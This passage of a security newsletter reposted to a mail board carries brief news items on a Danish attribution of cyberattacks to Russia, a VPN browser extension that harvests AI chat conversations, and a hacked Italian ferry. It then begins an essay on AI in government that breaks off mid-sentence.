$1 Part4
From
TCOB1 Security Posts@21:1/229 to
All on Thu Jan 15 20:29:29 2026
since 2014, that was the root cause of the initial intrusion into Ascension's network.
Fun fact: RC4 was a trade secret until I published the algorithm in the second edition of Applied Cryptography in 1995.
** *** ***** ******* *********** *************
Denmark Accuses Russia of Conducting Two Cyberattacks
[2025.12.23] News:
The Danish Defence Intelligence Service (DDIS) announced on Thursday that Moscow was behind a cyber-attack on a Danish water utility in 2024 and a series of distributed denial-of-service (DDoS) attacks on Danish websites in the lead-up to the municipal and regional council elections in November.
The first, it said, was carried out by the pro-Russian group known as Z-Pentest and the second by NoName057(16), which has links to the Russian state.
Slashdot thread.
** *** ***** ******* *********** *************
Urban VPN Proxy Surreptitiously Intercepts AI Chats
[2025.12.24] This is pretty scary:
Urban VPN Proxy targets conversations across ten AI platforms: ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok (xAI), Meta AI.
For each platform, the extension includes a dedicated "executor" script designed to intercept and capture conversations. The harvesting is enabled by default through hardcoded flags in the extension's configuration.
There is no user-facing toggle to disable this. The only way to stop the data collection is to uninstall the extension entirely.
[...]
The data collection operates independently of the VPN functionality. Whether the VPN is connected or not, the harvesting runs continuously in the background.
[...]
What gets captured:
Every prompt you send to the AI
Every response you receive
Conversation identifiers and timestamps
Session metadata
The specific AI platform and model used
Boing Boing post.
EDITED TO ADD (12/15): Two news articles.
** *** ***** ******* *********** *************
IoT Hack
[2025.12.26] Someone hacked an Italian ferry.
It looks like the malware was installed by someone on the ferry, and not remotely.
** *** ***** ******* *********** *************
Are We Ready to Be Governed by Artificial Intelligence?
[2025.12.29] Artificial Intelligence (AI) overlords are a common trope in science-fiction dystopias, but the reality looks much more prosaic. The technologies of artificial intelligence are already pervading many aspects of democratic government, affecting our lives in ways both large and small. This has occurred largely without our notice or consent. The result is a government incrementally transformed by AI rather than the singular technological overlord of the big screen.
Let us begin with the executive branch. One of the most important functions of this branch of government is to administer the law, including the human services on which so many Americans rely. Many of these programs have long been operated by a mix of humans and machines, even if not previously using modern AI tools such as Large Language Models.
A salient example is healthcare, where private insurers make widespread use of algorithms to review, approve, and deny coverage, even for recipients of public benefits like Medicare. While Biden-era guidance from the Centers for Medicare and Medicaid Services (CMS) largely blesses this use of AI by Medicare Advantage operators, the practice of overriding the medical care recommendations made by physicians raises profound ethical questions, with life and death implications for about thirty million Americans today.
This April, the Trump administration reversed many administrative guardrails on AI, relieving Medicare Advantage plans from the obligation to avoid AI-enabled patient discrimination. This month, the Trump administration took a step further. CMS rolled out an aggressive new program that financially rewards vendors that leverage AI to reject rapidly prior authorization for "wasteful" physician or provider-requested medical services. The same month, the Trump administration also issued an executive order limiting the abilities of states to put consumer and patient protections around the use of AI.
This shows both growing confidence in AI's efficiency and a deliberate choice to benefit from it without restricting its possible harms. Critics of the CMS program have characterized it as effectively establishing a bounty on denying care; AI -- in this case -- is being used to serve a ministerial function in applying that policy. But AI could equally be used to automate a different policy objective, such as minimizing the time required to approve pre-authorizations for necessary services or to minimize the effort required of providers to achieve authorization.
Next up is the judiciary. Setting aside concerns about activist judges and court overreach, jurists are not supposed to decide what law is. The function of judges and courts is to interpret the law written by others. Just as jurists have long turned to dictionaries and expert witnesses for assistance in their interpretation, AI has already emerged as a tool used by judges to infer legislative intent and decide on cases. In 2023, a Colombian judge was the first publicly to use AI to help make a ruling. The first known American federal example came a year later when United States Circuit Judge Kevin Newsom began using AI in his jurisprudence, to provide second "opinions" on the plain language meaning of words in statute. A District of Columbia Court of Appeals similarly used ChatGPT in 2025 to deliver an interpretation of what common knowledge is. And there are more examples from Latin America, the United Kingdom, India, and beyond.
Given that these examples are likely merely the tip of the iceberg, it is also important to remember that any judge can unilaterally choose to consult an AI while drafting his opinions, just as he may choose to consult other human beings, and a judge may be under no obligation to disclose when he does.
This is not necessarily a bad thing. AI has the ability to replace humans but also to augment human capabilities, which may significantly expand human agency. Whether the results are good or otherwise depends on many factors. These include the application and its situation, the characteristics and performance of the AI model, and the characteristics and performance of the humans it augments or replaces. This general model applies to the use of AI in the judiciary.
Each application of AI legitimately needs to be considered in its own context, but certain principles should apply in all uses of AI in democratic contexts. First and foremost, we argue, AI should be applied in ways that decentralize rather than concentrate power. It should be used to empower individual human actors rather than automating the decision-making of a central authority. We are open to independent judges selecting and leveraging AI models as tools in their own jurisprudence, but we remain concerned about Big Tech companies building and operating a dominant AI product that becomes widely used throughout the judiciary.
This principle brings us to the legislature. Policymakers worldwide are already using AI in many aspects of lawmaking. In 2023, the first law writ
--- FMail-lnx 2.3.2.6-B20251227
* Origin: TCOB1 A Mail Only System (21:1/229)